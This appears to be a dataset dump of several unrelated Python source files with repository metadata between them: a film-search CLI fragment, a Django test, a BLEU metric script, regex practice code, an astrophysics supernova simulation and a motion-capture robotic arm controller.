True if the film passes verification, else False
"""
# If no matches are found, continually prompt user to find a correct match.
while len(film.matches) == 0:
return cls.handle_unknown_film(film)
console().indent().bold().white('Search results:').print()
# Generate a list of choices based on search results and save the input
# to `choice`.
choice = cls._choice_input(
prompt="",
choices=[f"{m.proposed_title} ({m.proposed_year}) [{m.tmdb_id}]" for m in film.matches] +
['[ New search ]', '[ Search by ID ]', '[ Skip ]'],
enumeration='number',
mock_input=_first(config.mock_input))
config.mock_input = _shift(config.mock_input)
# If 'Edit search' was selected, try again, then forward
# the return value.
if choice == len(film.matches):
return cls.search_by_name(film)
# If 'Search by ID' was selected, redirect to ID lookup, then forward
# the return value.
elif choice == len(film.matches) + 1:
return cls.lookup_by_id(film)
# If skipping, return False
elif choice == len(film.matches) + 2:
film.tmdb_id = None
film.ignore_reason = 'Skipped'
console().print_interactive_skipped()
return False
# If we haven't returned yet, update the film with the selected match
# and mark it as verified.
film.update_with_match(film.matches[choice])
film.tmdb_verified = True
console().print_search_result(film)
return True
@classmethod
def _simple_input(cls, prompt, prefill='', mock_input=None):
"""Simple prompt for input
Ask the user for input. Extremely thin wrapper around the common input() function
Args:
prompt: (str) Text printed to standard output before reading input
prefill: (str) Prefilled text
mock_input: (char) A mock input response for tests
Returns:
The user's input
"""
if mock_input is not None:
return mock_input
readline.set_startup_hook(lambda: readline.insert_text(prefill))
try:
return console.get_input(prompt)
finally:
readline.set_startup_hook()
@classmethod
def _condition_input(cls, prompt, default, prefill='', return_type=str, condition=None, error_message=None, mock_input=None):
"""Conditional prompt for input using lambda to verify condition.
Ask the user for input, checking if it meets a condition function.
Args:
prompt: (str) The question the user will be asked
return_type: (type) The type the user's input will be casted to
condition: (optional lambda function) An optional check, done AFTER the type cast
error_message: (str) An optional error message to be shown when an input does not meet the condition
mock_input: (char) A mock input response for tests
Returns:
The user's input, casted to return_type and complying with condition
"""
while True:
try:
answer = return_type(cls._simple_input(prompt, prefill, mock_input=mock_input))
except ValueError:
print(error_message)
continue
if answer == '' and default is not None:
answer = default
if condition is not None:
if condition(answer):
return answer
elif mock_input is not None:
raise ValueError(str(mock_input) + ' is not a valid mock value')
else:
return answer
if error_message is not None:
print(error_message)
@classmethod
def _choice_input(cls, prompt, choices, default=None, prefill='', enumeration='char', error_message=None, mock_input=None):
"""Choice-based prompt for input.
Ask the user for input from a set of choices.
Args:
prompt: (str) The question the user will be asked
choices: (list(str)) A list of choices the user has to select from
enumeration: (str) Can be 'number' or 'char'. 'char' should only be used when len(choices)<27
error_message: (str) An optional error message to be shown when an input is not a valid choice
mock_input: (char) A mock input response for tests
Returns:
The index of the selected choice
"""
if enumeration == 'number':
chars = [str(x + 1) for x in range(len(choices))]
elif enumeration == 'char':
assert len(choices) < 27, "To many choices to be represented by single letters"
chars = [x[0].title() if isinstance(x, tuple) else x[:1].title() for x in choices]
choices = [x[1] if isinstance(x, tuple) else x for x in choices]
else:
raise ValueError("enumeration is not 'number' or 'char'")
for idx, choice in zip(chars, choices):
console().print_choice(idx, choice)
answer = cls._condition_input(
prompt,
condition=lambda x: x.upper() in chars,
default=default,
prefill=prefill,
error_message=error_message,
mock_input=mock_input)
return chars.index(answer.upper())
def _shift(l):
try:
l.pop(0)
except Exception:
pass
return l
def _first(l):
try:
return l[0]
except Exception:
return l
|
[
"brandon@behemoth.ca"
] |
brandon@behemoth.ca
|
94de14f357e70da795981af25394211200312198
|
921c29354a9065a4f76f816c2b2ec68457f66aef
|
/todo/tests/test_list.py
|
59b1f2108648872be5f06b3a9d1e6a70268cc39f
|
[] |
no_license
|
AmrAnwar/ToDoList
|
520fa0529090183832dfd8c274fb3e7dad4d7a3b
|
de5e9e9887dee857e6169184aa9c7b74f31d32c4
|
refs/heads/master
| 2020-04-11T15:51:39.869491
| 2018-12-15T17:20:11
| 2018-12-15T17:20:11
| 161,905,711
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,018
|
py
|
from django.core.urlresolvers import reverse
from .test_init import InitTest
from ..models import List, Task, Code
class TestList(InitTest):
def setUp(self):
super(TestList, self).setUp()
def test_lists_view(self):
self.assertEqual(self.client.get(reverse('lists-list')).status_code, 302)
res = self.client.get(self.list.get_absolute_url())
self.assertEqual(res.status_code, 404)
self.client.login(username='guest', password='password')
res = self.client.get(reverse('lists-list'))
self.assertEqual(res.status_code, 200)
res = self.client.get(self.list.get_absolute_url())
self.assertEqual(res.status_code, 200)
# def test_form_valid(self):
# self.client.login(username='guest', password='password')
# data = {
# 'title': 'mylist'
# }
# count = List.objects.count()
# self.client.post(reverse("lists-list"), data=data)
# self.assertEqual(count+1, List.objects.count())
|
[
"amranwar945@gmail.com"
] |
amranwar945@gmail.com
|
7ddceea06214f7c2ad30fe2c4a2fe49f3644880a
|
c658bd535bad0ee0bbb3be94d624ba0f2dda284f
|
/src/summarization_models/models/codebert/bleu.py
|
dc7df4a9b3577639bdfc114656d6ef6cb429417a
|
[] |
no_license
|
Anonymous-ICSE-2022/ICSE2022_submission
|
fa2de62091f95eeb4575f75811dbaf2d3e970efb
|
8b1879b6b33dbd670af5c091c9bffb1f098bc868
|
refs/heads/main
| 2023-07-31T21:49:23.399103
| 2021-09-19T16:15:05
| 2021-09-19T16:15:05
| 397,334,177
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,916
|
py
|
'''
This script was adapted from the original version by hieuhoang1972 which is part of MOSES.
'''
# $Id: bleu.py 1307 2007-03-14 22:22:36Z hieuhoang1972 $
'''Provides:
cook_refs(refs, n=4): Transform a list of reference sentences as strings into a form usable by cook_test().
cook_test(test, refs, n=4): Transform a test sentence as a string (together with the cooked reference sentences) into a form usable by score_cooked().
score_cooked(alltest, n=4): Score a list of cooked test sentences.
score_set(s, testid, refids, n=4): Interface with dataset.py; calculate BLEU score of testid against refids.
The reason for breaking the BLEU computation into three phases cook_refs(), cook_test(), and score_cooked() is to allow the caller to calculate BLEU scores for multiple test sets as efficiently as possible.
'''
import math
import os
import re
import subprocess
import sys
import xml.sax.saxutils
# Added to bypass NIST-style pre-processing of hyp and ref files -- wade
nonorm = 0
preserve_case = False
eff_ref_len = "shortest"
normalize1 = [
('<skipped>', ''), # strip "skipped" tags
(r'-\n', ''), # strip end-of-line hyphenation and join lines
(r'\n', ' '), # join lines
# (r'(\d)\s+(?=\d)', r'\1'), # join digits
]
normalize1 = [(re.compile(pattern), replace) for (pattern, replace) in normalize1]
normalize2 = [
(r'([\{-\~\[-\` -\&\(-\+\:-\@\/])',r' \1 '), # tokenize punctuation. apostrophe is missing
(r'([^0-9])([\.,])',r'\1 \2 '), # tokenize period and comma unless preceded by a digit
(r'([\.,])([^0-9])',r' \1 \2'), # tokenize period and comma unless followed by a digit
(r'([0-9])(-)',r'\1 \2 ') # tokenize dash when preceded by a digit
]
normalize2 = [(re.compile(pattern), replace) for (pattern, replace) in normalize2]
def normalize(s):
'''Normalize and tokenize text. This is lifted from NIST mteval-v11a.pl.'''
# Added to bypass NIST-style pre-processing of hyp and ref files -- wade
if (nonorm):
return s.split()
if type(s) is not str:
s = " ".join(s)
# language-independent part:
for (pattern, replace) in normalize1:
s = re.sub(pattern, replace, s)
s = xml.sax.saxutils.unescape(s, {'"':'"'})
# language-dependent part (assuming Western languages):
s = " %s " % s
if not preserve_case:
s = s.lower() # this might not be identical to the original
for (pattern, replace) in normalize2:
s = re.sub(pattern, replace, s)
return s.split()
def count_ngrams(words, n=4):
counts = {}
for k in range(1,n+1):
for i in range(len(words)-k+1):
ngram = tuple(words[i:i+k])
counts[ngram] = counts.get(ngram, 0)+1
return counts
def cook_refs(refs, n=4):
'''Takes a list of reference sentences for a single segment
and returns an object that encapsulates everything that BLEU
needs to know about them.'''
refs = [normalize(ref) for ref in refs]
maxcounts = {}
for ref in refs:
counts = count_ngrams(ref, n)
for (ngram,count) in counts.items():
maxcounts[ngram] = max(maxcounts.get(ngram,0), count)
return ([len(ref) for ref in refs], maxcounts)
def cook_test(test, item, n=4):
'''Takes a test sentence and returns an object that
encapsulates everything that BLEU needs to know about it.'''
(reflens, refmaxcounts)=item
test = normalize(test)
result = {}
result["testlen"] = len(test)
# Calculate effective reference sentence length.
if eff_ref_len == "shortest":
result["reflen"] = min(reflens)
elif eff_ref_len == "average":
result["reflen"] = float(sum(reflens))/len(reflens)
elif eff_ref_len == "closest":
min_diff = None
for reflen in reflens:
if min_diff is None or abs(reflen-len(test)) < min_diff:
min_diff = abs(reflen-len(test))
result['reflen'] = reflen
result["guess"] = [max(len(test)-k+1,0) for k in range(1,n+1)]
result['correct'] = [0]*n
counts = count_ngrams(test, n)
for (ngram, count) in counts.items():
result["correct"][len(ngram)-1] += min(refmaxcounts.get(ngram,0), count)
return result
def score_cooked(allcomps, n=4, ground=0, smooth=1):
totalcomps = {'testlen':0, 'reflen':0, 'guess':[0]*n, 'correct':[0]*n}
for comps in allcomps:
for key in ['testlen','reflen']:
totalcomps[key] += comps[key]
for key in ['guess','correct']:
for k in range(n):
totalcomps[key][k] += comps[key][k]
logbleu = 0.0
all_bleus = []
for k in range(n):
correct = totalcomps['correct'][k]
guess = totalcomps['guess'][k]
addsmooth = 0
if smooth == 1 and k > 0:
addsmooth = 1
logbleu += math.log(correct + addsmooth + sys.float_info.min)-math.log(guess + addsmooth+ sys.float_info.min)
if guess == 0:
all_bleus.append(-10000000)
else:
all_bleus.append(math.log(correct + sys.float_info.min)-math.log( guess ))
logbleu /= float(n)
all_bleus.insert(0, logbleu)
brevPenalty = min(0,1-float(totalcomps['reflen'] + 1)/(totalcomps['testlen'] + 1))
for i in range(len(all_bleus)):
if i ==0:
all_bleus[i] += brevPenalty
all_bleus[i] = math.exp(all_bleus[i])
return all_bleus
def bleu(refs, candidate, ground=0, smooth=1):
refs = cook_refs(refs)
test = cook_test(candidate, refs)
return score_cooked([test], ground=ground, smooth=smooth)
def splitPuncts(line):
return ' '.join(re.findall(r"[\w]+|[^\s\w]", line))
def computeMaps(predictions, goldfile):
predictionMap = {}
goldMap = {}
gf = open(goldfile, 'r')
for row in predictions:
cols = row.strip().split('\t')
if len(cols) == 1:
(rid, pred) = (cols[0], '')
else:
(rid, pred) = (cols[0], cols[1])
predictionMap[rid] = [splitPuncts(pred.strip().lower())]
for row in gf:
(rid, pred) = row.split('\t')
if rid in predictionMap: # Only insert if the id exists for the method
if rid not in goldMap:
goldMap[rid] = []
goldMap[rid].append(splitPuncts(pred.strip().lower()))
sys.stderr.write('Total: ' + str(len(goldMap)) + '\n')
return (goldMap, predictionMap)
#m1 is the reference map
#m2 is the prediction map
def bleuFromMaps(m1, m2):
score = [0] * 5
num = 0.0
for key in m1:
if key in m2:
bl = bleu(m1[key], m2[key][0])
score = [ score[i] + bl[i] for i in range(0, len(bl))]
num += 1
return [s * 100.0 / num for s in score]
if __name__ == '__main__':
reference_file = sys.argv[1]
predictions = []
for row in sys.stdin:
predictions.append(row)
(goldMap, predictionMap) = computeMaps(predictions, reference_file)
print (bleuFromMaps(goldMap, predictionMap)[0])
|
[
""
] | |
a38c1a112526984dc7ad1084e7a9f0aacc58d696
|
0659bf3ea0b4560074345ad29fe7cae549a8d029
|
/testrun.py
|
69b57e5ad0865991518f5992d1fd21568d3f816d
|
[] |
no_license
|
alankrit03/Problem_Solving
|
a63df4fc10c3b318341a3e37fef7fe1256c4b688
|
9964e2fbe97d08aa1647b2d64412607039b5bffb
|
refs/heads/master
| 2021-01-08T17:28:17.984540
| 2020-08-07T06:14:17
| 2020-08-07T06:14:17
| 242,094,556
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 972
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Wed Mar 27 19:10:51 2019
@author: Alankrit Agarwal
"""
import re
m = re.match(r'(?P<user>\w+)@(?P<website>\w+)\.(?P<exteon>\w+)','alankrit@hackerrank.com')
print(m.groupdict())
lst=re.fullmatch
s='alankrit'
pat=r'al'
t=re.sub(pat,'new',s)
print(s,t,sep='\n')
def test():
# Enter your code here. Read input from STDIN. Print output to STDOUT
import re
for _ in range(int(input())):
s=input()
not_allowed_char=r'[^0-9-]'
if re.search(not_allowed_char,s):
print("Invalid")
else:
nor_pat=r'^[456]{1}[0-9]{15}' #checking for normal code without any dashes
if re.search(nor_pat,s):
if re.search(r'(\d)\3{4,}',s):
print("Invalid")
else:
pass
print("VAl")
pattern = r"Cookie"
sequence = "Cooki8e7"
if re.match(pattern, sequence):
print("Match!")
else: print("Not a match!")
|
[
"alankritagarwal9@gmail.com"
] |
alankritagarwal9@gmail.com
|
24354294eca3956b51129456dbfee5bb9fc841d8
|
bfb6ccbcb2707bca5eb44f2b64c0084aa6561b5a
|
/docs/examples/textbook/supernova_grid.py
|
45329e4f46a5dc12c888d92335755d81eac53405
|
[
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
cgroeneveld/amuse
|
79c8ece558f484df4494609e95274cffd5c37c60
|
9684fd22ce8293b837d2c78f56948e3ec3d04032
|
refs/heads/master
| 2020-08-16T16:44:46.702465
| 2019-10-14T19:16:04
| 2019-10-14T19:16:04
| 215,526,071
| 0
| 0
|
Apache-2.0
| 2019-10-16T10:57:34
| 2019-10-16T10:57:34
| null |
UTF-8
|
Python
| false
| false
| 7,418
|
py
|
import numpy
from amuse.lab import *
#from amuse import plot
from amuse.ext import cloud
from matplotlib import pyplot
from amuse import datamodel
from amuse.ext.sph_to_grid import convert_SPH_to_grid
from amuse.community.capreole.interface import Capreole
from amuse.units.generic_unit_converter import ConvertBetweenGenericAndSiUnits
def plot_grid(grid, time= 0.0|units.day):
pyplot.rcParams.update({'font.size': 30})
figure = pyplot.figure(figsize=(12, 12))
halfway = len(grid.rho[...,0,0])/2
rho = grid.rho[:,:,halfway].value_in(units.g/units.cm**3)
print "Extrema density:", halfway, rho.min(), rho.max()
max_dens = rho.max()
# max_dens = 32
plot = figure.add_subplot(1,1,1)
# cax = plot.imshow(rho, interpolation='nearest', origin = 'lower', extent=[-5, 5, -5, 5], cmap="hot")
cax = plot.imshow(rho, interpolation='bicubic', origin = 'lower', extent=[-5, 5, -5, 5], cmap="hot")
cbar = figure.colorbar(cax, ticks=[1.e-8, 0.5*max_dens, max_dens], orientation='vertical', fraction=0.045)
rmin = 0.0
rmid = "%.1f" % (0.5*max_dens)
rmax = "%.1f" % (max_dens)
# cbar.ax.set_yticklabels(['Low', ' ', 'High']) # horizontal colorbar
cbar.ax.set_yticklabels([rmin, ' ', rmax]) # horizontal colorbar
cbar.set_label('mid-plane density [$g/cm^3$]', rotation=270)
pyplot.xlabel("x [R$_\odot$]")
pyplot.ylabel("y [R$_\odot$]")
t = int(time.value_in(units.s))
filename = "supernova_grid_T"+str(t)+".png"
figure.savefig(filename)
# pyplot.show()
def setup_sph_code(sph_code, N, L, rho, u):
converter = ConvertBetweenGenericAndSiUnits(L, rho, constants.G)
sph_code = sph_code(converter, mode = 'periodic')#, redirection = 'none')
sph_code.parameters.periodic_box_size = 10.0 | units.parsec
plummer = new_plummer_gas_model(N, convert_nbody=converter)
plummer = plummer.select(lambda r: r.length()<0.5*L,["position"])
N = len(plummer)
print "N=", len(plummer)
plummer.mass = (rho * L**3) / N
gas = Particles(N)
gas.mass = 0.001*(rho * L**3) / N
numpy.random.seed(12345)
gas.x = L * numpy.random.uniform(0.0, 1.0, N)
gas.y = L * numpy.random.uniform(0.0, 1.0, N)
gas.z = L * numpy.random.uniform(0.0, 1.0, N)
gas.vx = numpy.zeros(N) | units.cm / units.s
gas.vy = numpy.zeros(N) | units.cm / units.s
gas.vz = numpy.zeros(N) | units.cm / units.s
gas.u = u
if isinstance(sph_code, Fi):
sph_code.parameters.self_gravity_flag = False
sph_code.parameters.timestep = 0.1 | generic_unit_system.time
gas.h_smooth = L / N**(1/3.0)
gas.position -= 0.5 * L
sph_code.gas_particles.add_particles(gas)
sph_code.gas_particles.add_particles(plummer)
sph_code.commit_particles()
return sph_code
def main(stellar_mass, stellar_radius, core_mass, core_radius, t_end, dt, resolution):
grid_size = 10 * stellar_radius
hydro = initialize_grid_code(resolution, grid_size)
grid = initialize_grid(stellar_mass, stellar_radius, core_mass, core_radius, resolution, grid_size)
cth = grid.new_channel_to(hydro.grid)
cth.copy()
hydro.initialize_grid()
run_grid_code(hydro, grid, t_end, dt)
def initialize_grid_code(resolution, grid_size):
converter = nbody_system.nbody_to_si(1|units.MSun, 1|units.RSun)
instance = Athena(converter, number_of_workers=4)
instance.initialize_code()
instance.parameters.gamma = 5/3.0
instance.parameters.courant_number=0.3
instance.parameters.nx = resolution
instance.parameters.ny = resolution
instance.parameters.nz = resolution
instance.parameters.length_x = grid_size
instance.parameters.length_y = grid_size
instance.parameters.length_z = grid_size
instance.x_boundary_conditions = ("outflow", "outflow")
instance.y_boundary_conditions = ("outflow", "outflow")
instance.z_boundary_conditions = ("outflow", "outflow")
instance.commit_parameters()
return instance
def initialize_grid(stellar_mass, stellar_radius, core_mass, core_radius, resolution, grid_size):
n = resolution
r = grid_size.value_in(units.RSun)
grid = datamodel.new_regular_grid((n,n,n), [r, r, r] | units.RSun)
momentum = units.kg / (units.s * units.m**2)
grid_size = units.RSun
energy_density = units.erg / grid_size**3
supernova_energy = 1.e+51 | units.erg
stellar_energy_density = 0.01*supernova_energy/stellar_radius**3
supernova_energy_density = supernova_energy/core_radius**3
stellar_density = stellar_mass/stellar_radius**3
grid.rho = 1.e-10 * stellar_density
grid.rhovx = 0.0 | momentum
grid.rhovy = 0.0 | momentum
grid.rhovz = 0.0 | momentum
grid.energy = 1 | energy_density
datamodel.Grid.add_global_vector_attribute("position", ["x","y","z"])
cloud.fill_grid_with_spherical_cloud(
grid,
center = [5.0, 5.0, 5.0] | units.RSun,
radius = stellar_radius,
rho = stellar_density,
rhovx = 0.0 | momentum,
rhovy = 0.0 | momentum,
rhovz = 0.0 | momentum,
energy = stellar_energy_density
)
cloud.fill_grid_with_spherical_cloud(
grid,
center = [5.0, 5.0, 5.0] | units.RSun,
radius = core_radius,
rho = core_mass/core_radius**3,
rhovx = 0.0 | momentum,
rhovy = 0.0 | momentum,
rhovz = 0.0 | momentum,
energy = supernova_energy_density
#subgridsize = 16,
)
return grid
def run_grid_code(hydro, grid, t_end, dt):
ctg = hydro.grid.new_channel_to(grid)
ctg.copy()
plot_grid(grid)
while hydro.model_time<t_end:
print "Time=", hydro.model_time.in_(units.s)
hydro.evolve_model(hydro.model_time + dt)
ctg.copy()
plot_grid(grid, hydro.model_time)
hydro.stop()
def new_option_parser():
from amuse.units.optparse import OptionParser
result = OptionParser()
result.add_option("-t", unit=units.s,
dest="t_end", type="float", default = 300.0|units.s,
help="end time of the simulation [%default]")
result.add_option("-d", unit=units.s,
dest="dt", type="float", default = 50.0|units.s,
help="diagnostic time step [%default]")
result.add_option("-M", unit=units.MSun,
dest="stellar_mass", type="float", default = 3|units.MSun,
help="Mass of the star [%default]")
result.add_option("-R", unit=units.RSun,
dest="stellar_radius", type="float", default = 1|units.RSun,
help="Radius of the star [%default]")
result.add_option("-m", unit=units.MSun,
dest="core_mass", type="float", default = 1.4|units.MSun,
help="Mass of the stellar core [%default]")
result.add_option("-n",
dest="resolution", type="int", default = 256,
help="Resolution of the grid [%default]")
result.add_option("-r", unit=units.RSun,
dest="core_radius", type="float", default = 0.1|units.RSun,
help="Radius of the stellar core [%default]")
return result
if __name__ in ('__main__', '__plot__'):
o, arguments = new_option_parser().parse_args()
main(**o.__dict__)
|
[
"steven@rieder.nl"
] |
steven@rieder.nl
|
815554f3d7dd47f3a7f9a275ca23544ae727e1b8
|
460cb457a056fcd2140eb78d2ae9bdc90c298919
|
/control.py
|
15f49ec341fa9f67ac91f8ac436aa7b196aef08f
|
[
"MIT"
] |
permissive
|
jonathanzxu/mocap-roboticarm
|
3b4f2e2fbf4bd541ba83b3ebdf6ab4e44424e9dd
|
957f77249766c1b40b8416a9236a2c60c734e3cd
|
refs/heads/main
| 2023-07-11T10:08:48.137661
| 2021-08-13T23:05:50
| 2021-08-13T23:05:50
| 393,493,925
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 15,508
|
py
|
import math
import numpy as np
import owl
import time
import matplotlib.pyplot as plt
import matplotlib.animation as anim
from mpl_toolkits.mplot3d import Axes3D
import serial
def normalize(v):
norm = np.sqrt(np.sum(v**2))
if norm == 0:
return v
return v / norm
def lowpass(new, old):
p1 = 0.7
p2 = 0.3
return int(p1 * old + p2 * new)
#markers = 2d list with double xyz positions of each marker
def calculateangles(markers):
global oldangles
m0 = np.array(markers[0], dtype=float)
m1 = np.array(markers[1], dtype=float)
m2 = np.array(markers[2], dtype=float)
m3 = np.array(markers[3], dtype=float)
m4 = np.array(markers[4], dtype=float)
m5 = np.array(markers[5], dtype=float)
m6 = np.array(markers[6], dtype=float)
m7 = np.array(markers[7], dtype=float)
m8 = np.array(markers[8], dtype=float)
m9 = np.array(markers[9], dtype=float)
m10 = np.array(markers[10], dtype=float)
m11 = np.array(markers[11], dtype=float)
#generate rotation matrices with respect to global coordinate system
y1 = m1 - m0
v1 = m1 - m2
z1 = np.cross(y1, v1)
x1 = np.cross(z1, y1)
y2 = m5 - m4
v2 = m4 - m3
z2 = np.cross(v2, y2)
x2 = np.cross(z2, y2)
y3 = m8 - m7
v3 = m7 - m6
z3 = np.cross(v3, y3)
x3 = np.cross(z3, y3)
y4 = m11 - m10
v4 = m10 - m9
z4 = np.cross(v4, y4)
x4 = np.cross(z4, y4)
x1 = normalize(x1)
y1 = normalize(y1)
z1 = normalize(z1)
x2 = normalize(x2)
y2 = normalize(y2)
z2 = normalize(z2)
x3 = normalize(x3)
y3 = normalize(y3)
z3 = normalize(z3)
x4 = normalize(x4)
y4 = normalize(y4)
z4 = normalize(z4)
#notation: Rab = rotation matrix of b from a; g = global
#print(x1)
Rg1 = np.transpose(np.array([x1, y1, z1]))
Rg2 = np.transpose(np.array([x2, y2, z2]))
Rg3 = np.transpose(np.array([x3, y3, z3]))
Rg4 = np.transpose(np.array([x4, y4, z4]))
#print(Rg1)
#print(Rg2)
#print(Rg3)
#print(Rg4)
#new rot matrices
R12 = np.matmul(np.linalg.inv(Rg1), Rg2)
R23 = np.matmul(np.linalg.inv(Rg2), Rg3)
R34 = np.matmul(np.linalg.inv(Rg3), Rg4)
#print(R12)
#print(R23)
#print(R34)
#calculate euler angles
'''
alphag1 = math.degrees(np.arctan(Rg1[1, 0]/Rg1[0, 0]))
betag1 = math.degrees(np.arcsin(-1 * Rg1[2, 0]))
gammag1 = math.degrees(np.arctan(Rg1[2, 1]/Rg1[2, 2]))
alpha12 = math.degrees(np.arctan(R12[1, 0]/R12[0, 0]))
beta12 = math.degrees(np.arcsin(-1 * R12[2, 0]))
gamma12 = math.degrees(np.arctan(R12[2, 1]/R12[2, 2]))
alpha23 = math.degrees(np.arctan(R23[1, 0]/R23[0, 0]))
beta23 = math.degrees(np.arcsin(-1 * R23[2, 0]))
gamma23 = math.degrees(np.arctan(R23[2, 1]/R23[2, 2]))
alpha34 = math.degrees(np.arctan(R34[1, 0]/R34[0, 0]))
beta34 = math.degrees(np.arcsin(-1 * R34[2, 0]))
gamma34 = math.degrees(np.arctan(R34[2, 1]/R34[2, 2]))
'''
betag1 = np.arctan2(-1*Rg1[2,0], np.sqrt(Rg1[0,0]**2 + Rg1[1,0]**2))
alphag1 = math.degrees(np.arctan2(Rg1[1,0]/np.cos(betag1), Rg1[0,0]/np.cos(betag1)))
gammag1 = math.degrees(np.arctan2(Rg1[2,1]/np.cos(betag1), Rg1[2,2]/np.cos(betag1)))
betag1 = math.degrees(betag1)
beta12 = np.arctan2(-1*R12[2,0], np.sqrt(R12[0,0]**2 + R12[1,0]**2))
alpha12 = math.degrees(np.arctan2(R12[1,0]/np.cos(beta12), R12[0,0]/np.cos(beta12)))
gamma12 = math.degrees(np.arctan2(R12[2,1]/np.cos(beta12), R12[2,2]/np.cos(beta12)))
beta12 = math.degrees(beta12)
beta23 = np.arctan2(-1*R23[2,0], np.sqrt(R23[0,0]**2 + R23[1,0]**2))
alpha23 = math.degrees(np.arctan2(R23[1,0]/np.cos(beta23), R23[0,0]/np.cos(beta23)))
gamma23 = math.degrees(np.arctan2(R23[2,1]/np.cos(beta23), R23[2,2]/np.cos(beta23)))
beta23 = math.degrees(beta23)
beta34 = np.arctan2(-1*R34[2,0], np.sqrt(R34[0,0]**2 + R34[1,0]**2))
alpha34 = math.degrees(np.arctan2(R34[1,0]/np.cos(beta34), R34[0,0]/np.cos(beta34)))
gamma34 = math.degrees(np.arctan2(R34[2,1]/np.cos(beta34), R34[2,2]/np.cos(beta34)))
beta34 = math.degrees(beta34)
#print(f"1 to 2 angles - alpha: {alpha12}° beta: {beta12}° gamma: {gamma12}°")
#print(f"2 to 3 angles - alpha: {alpha23}° beta: {beta23}° gamma: {gamma23}°")
#print(f"3 to 4 angles - alpha: {alpha34}° beta: {beta34}° gamma: {gamma34}°")
#print(f"Approximate angles: Shoulder Rotated ≈ {int(gamma12)}° - Shoulder Tilted ≈ {int(alpha12)}° - Elbow Tilted ≈ {int(alpha23)}° - Wrist Tilted ≈ {int(alpha34 if alpha34 > 0 else (alpha34 + 360))}° - Wrist Rotated ≈ {-1*int(gamma34)}°")
#low pass filter
newangles = (lowpass(alpha12, oldangles[0]), lowpass(beta12, oldangles[1]), lowpass(alpha23, oldangles[2]), lowpass(alpha34, oldangles[3]), lowpass(gamma34, oldangles[4]))
oldangles = newangles
return newangles
#import numpy as np
#import pandas as pd
#SERVER = sys.argv[1]
SERVER = "192.168.1.230"
# instantiate context
o = owl.Context()
# connect to server with timeout of 10000000 microseconds
o.open(SERVER, "timeout=10000000") # initialize session
o.initialize("streaming=1 profile=profile-arm")
# main loop
evt = None
def getLatestEvent():
global evt
global o
#print("getting latest event...")
temp = None
while o.isOpen() and o.property("initialized") and evt:
temp = evt
evt = o.nextEvent()
evt = temp
while not evt:
evt = o.nextEvent(1000000)
print("searching for event")
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.axes.set_xlim3d(left=-2000, right=2000)
ax.axes.set_ylim3d(bottom=-2000, top=2000)
ax.axes.set_zlim3d(bottom=-2000, top=2000)
ax.set_autoscale_on(False)
lastmarkers = [[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0]]
oldangles = [0,0,0,0,0]
#serial port init
ser = serial.Serial('COM16', baudrate=19200)
#hello world ping + arm setup
ser.write(bytearray([255, 13, 1, 0, 64, 64, 64, 69, 69, 69, 69, 69, 39]))
print(list(ser.read(size=13)))
ser.write(bytearray([255, 13, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 15]))
print(list(ser.read(size=13)))
ser.write(bytearray([255, 13, 1, 2, 0, 3, 0, 0, 1, 0, 0, 0, 20]))
print(list(ser.read(size=13)))
ser.write(bytearray([255, 13, 41, 1, 1, 0, 0, 0, 182, 78, 0, 0, 60]))
ser.write(bytearray([255, 13, 42, 10, 0, 1, 0, 0, 0, 0, 0, 0, 66]))
ser.write(bytearray([255, 13, 42, 10, 0, 2, 0, 0, 0, 0, 0, 0, 67]))
ser.write(bytearray([255, 13, 42, 10, 0, 3, 0, 0, 0, 0, 0, 0, 68]))
ser.write(bytearray([255, 13, 2, 2, 0, 0, 0, 0, 0, 0, 0, 0, 17]))
ser.write(bytearray([255, 13, 42, 10, 0, 20, 0, 0, 0, 0, 0, 0, 85]))
ser.write(bytearray([255, 13, 42, 10, 0, 21, 0, 0, 0, 0, 0, 0, 86]))
ser.write(bytearray([255, 13, 42, 10, 0, 22, 0, 0, 0, 0, 0, 0, 87]))
ser.write(bytearray([255, 13, 42, 10, 0, 23, 0, 0, 0, 0, 0, 0, 88]))
ser.write(bytearray([255, 13, 42, 10, 0, 24, 0, 0, 0, 0, 0, 0, 89]))
ser.write(bytearray([255, 13, 82, 10, 0, 1, 0, 0, 0, 0, 0, 0, 106]))
ser.write(bytearray([255, 13, 82, 10, 0, 2, 0, 0, 0, 0, 0, 0, 107]))
ser.write(bytearray([255, 13, 82, 10, 0, 3, 0, 0, 0, 0, 0, 0, 108]))
ser.write(bytearray([255, 13, 42, 20, 0, 0, 0, 0, 0, 0, 0, 0, 75]))
ser.write(bytearray([255, 13, 42, 20, 1, 0, 0, 0, 0, 0, 0, 0, 76]))
ser.write(bytearray([255, 13, 42, 20, 2, 0, 0, 0, 0, 0, 0, 0, 77]))
ser.write(bytearray([255, 13, 42, 20, 3, 0, 0, 0, 0, 0, 0, 0, 78]))
ser.write(bytearray([255, 13, 42, 20, 4, 0, 0, 0, 0, 0, 0, 0, 79]))
ser.write(bytearray([255, 13, 42, 20, 5, 0, 0, 0, 0, 0, 0, 0, 80]))
ser.write(bytearray([255, 13, 42, 21, 0, 1, 0, 0, 0, 0, 0, 0, 77]))
ser.write(bytearray([255, 13, 42, 21, 0, 2, 0, 0, 0, 0, 0, 0, 78]))
ser.write(bytearray([255, 13, 42, 21, 1, 1, 0, 0, 0, 0, 0, 0, 78]))
ser.write(bytearray([255, 13, 42, 21, 1, 2, 0, 0, 0, 0, 0, 0, 79]))
ser.write(bytearray([255, 13, 42, 21, 2, 1, 0, 0, 0, 0, 0, 0, 79]))
ser.write(bytearray([255, 13, 42, 21, 2, 2, 0, 0, 0, 0, 0, 0, 80]))
ser.write(bytearray([255, 13, 42, 21, 3, 1, 0, 0, 0, 0, 0, 0, 80]))
ser.write(bytearray([255, 13, 42, 21, 3, 2, 0, 0, 0, 0, 0, 0, 81]))
ser.write(bytearray([255, 13, 42, 21, 4, 1, 0, 0, 0, 0, 0, 0, 81]))
